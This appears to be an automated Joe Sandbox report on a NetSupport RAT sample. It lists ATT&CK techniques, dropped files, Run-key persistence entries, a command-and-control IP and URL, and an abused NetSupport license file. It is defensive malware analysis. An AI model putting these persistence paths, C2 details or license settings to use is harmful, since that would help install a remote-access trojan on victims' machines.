                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting
                                2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                Scripting
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                12
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                3
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                DLL Side-Loading
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts12
                                Command and Scripting Interpreter
                                2
                                Valid Accounts
                                21
                                Access Token Manipulation
                                2
                                Software Packing
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                4
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                1
                                Windows Service
                                1
                                Windows Service
                                1
                                DLL Side-Loading
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                5
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder
                                13
                                Process Injection
                                1
                                Masquerading
                                LSA Secrets251
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580475 Sample: d1c701d984c5e04b42f3cb7165f... Startdate: 24/12/2024 Architecture: WINDOWS Score: 96 38 geo.netsupportsoftware.com 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 8 d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe 17 2->8         started        11 bild.exe 2->11         started        13 bild.exe 2->13         started        15 bild.exe 2->15         started        signatures3 process4 file5 30 C:\Users\Public30etstat\remcmdstub.exe, PE32 8->30 dropped 32 C:\Users\Public32etstat\pcicapi.dll, PE32 8->32 dropped 34 C:\Users\Public34etstat\bild.exe, PE32 8->34 dropped 36 6 other files (3 malicious) 8->36 dropped 17 cmd.exe 1 8->17         started        process6 signatures7 44 Uses cmd line tools excessively to alter registry or file data 17->44 20 bild.exe 16 17->20         started        24 conhost.exe 17->24         started        26 reg.exe 1 1 17->26         started        28 reg.exe 1 1 17->28         started        process8 dnsIp9 40 45.76.253.210, 443, 49704 AS-CHOOPAUS United States 20->40 42 geo.netsupportsoftware.com 104.26.0.231, 49705, 49706, 49707 CLOUDFLARENETUS United States 20->42 54 Multi AV Scanner detection for dropped file 20->54 56 Contains functionalty to change the wallpaper 20->56 58 Delayed program exit found 20->58 60 Contains functionality to detect sleep reduction / modifications 20->60 signatures10

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe58%ReversingLabsWin32.Trojan.NetSupport
                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe
                                http://45.76.253.210/fakeurl.htm0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.0.231
                                truefalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.76.253.210/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.asp_bild.exe, 00000006.00000002.3898386960.00000000010AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.pci.co.uk/supportd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://%s/testpage.htmwininet.dllbild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        high
                                        http://www.pci.co.uk/supportsupportd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.symauth.com/rpa00d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                          high
                                          http://geo.netsupportsoftware.com/location/loca.asp~bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://127.0.0.1RESUMEPRINTINGd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspobild.exe, 00000006.00000002.3898386960.00000000010C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://%s/testpage.htmbild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.netsupportschool.com/tutor-assistant.asp11(d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                high
                                                http://geo.netsupportsoftware.com/location/loca.aspVbild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://127.0.0.1bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                    high
                                                    http://geo.netsupportsoftware.com/location/loca.asptbild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.symauth.com/cps0(d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                        high
                                                        http://www.netsupportschool.com/tutor-assistant.aspd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://%s/fakeurl.htmbild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        45.76.253.210
                                                        unknownUnited States
                                                        20473AS-CHOOPAUStrue
                                                        104.26.0.231
                                                        geo.netsupportsoftware.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1580475
                                                        Start date and time:2024-12-24 17:46:57 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 32s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                        Detection:MAL
                                                        Classification:mal96.rans.evad.winEXE@14/12@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 81%
                                                        • Number of executed functions: 209
                                                        • Number of non-executed functions: 155
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                        TimeTypeDescription
                                                        17:47:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
                                                        17:48:00AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
                                                        17:48:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.26.0.231file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        geo.netsupportsoftware.comfile.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • 104.26.0.231
                                                        5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.0.231
                                                        Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.1.231
                                                        lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.0.231
                                                        Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                        • 104.26.0.231
                                                        5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.1.231
                                                        Update.jsGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.1.231
                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.0.231
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS-CHOOPAUSarmv5l.elfGet hashmaliciousMiraiBrowse
                                                        • 66.42.103.144
                                                        jklm68k.elfGet hashmaliciousUnknownBrowse
                                                        • 44.40.163.25
                                                        nabsh4.elfGet hashmaliciousUnknownBrowse
                                                        • 44.172.196.44
                                                        nabarm5.elfGet hashmaliciousUnknownBrowse
                                                        • 217.163.30.244
                                                        nklx86.elfGet hashmaliciousUnknownBrowse
                                                        • 45.76.237.246
                                                        nklppc.elfGet hashmaliciousUnknownBrowse
                                                        • 173.199.121.211
                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                        • 44.168.169.170
                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 44.168.169.177
                                                        nsharm5.elfGet hashmaliciousMiraiBrowse
                                                        • 45.32.145.147
                                                        CLOUDFLARENETUSdatasett.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.3.46
                                                        https://tb.ldpdljrr.ru/Get hashmaliciousUnknownBrowse
                                                        • 104.21.30.230
                                                        installer.msiGet hashmaliciousUnknownBrowse
                                                        • 172.67.196.179
                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.88.181
                                                        badvbscript.htmlGet hashmaliciousUnknownBrowse
                                                        • 1.1.1.1
                                                        #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                        • 172.67.201.143
                                                        https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.33.227
                                                        iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                        • 172.67.199.72
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\Public\Netstat\PCICHEK.DLLhttps://tekascend.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                              lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                  5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        C:\Users\Public\Netstat\HTCTL32.DLLhttps://tekascend.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                              lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                                Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                                  5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):328056
                                                                                        Entropy (8bit):6.754723001562745
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                        MD5:2D3B207C8A48148296156E5725426C7F
                                                                                        SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                        SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                        SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                        Malicious:false
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: , Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: lFxGd66yDa.exe, Detection: malicious, Browse
                                                                                        • Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse
                                                                                        • Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):257
                                                                                        Entropy (8bit):5.119720931145611
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                        MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                        SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                        SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                        SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                        Malicious:false
                                                                                        Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):18808
                                                                                        Entropy (8bit):6.22028391196942
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                        MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                        SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                        SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                        SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                        Malicious:false
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: , Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: lFxGd66yDa.exe, Detection: malicious, Browse
                                                                                        • Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse
                                                                                        • Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
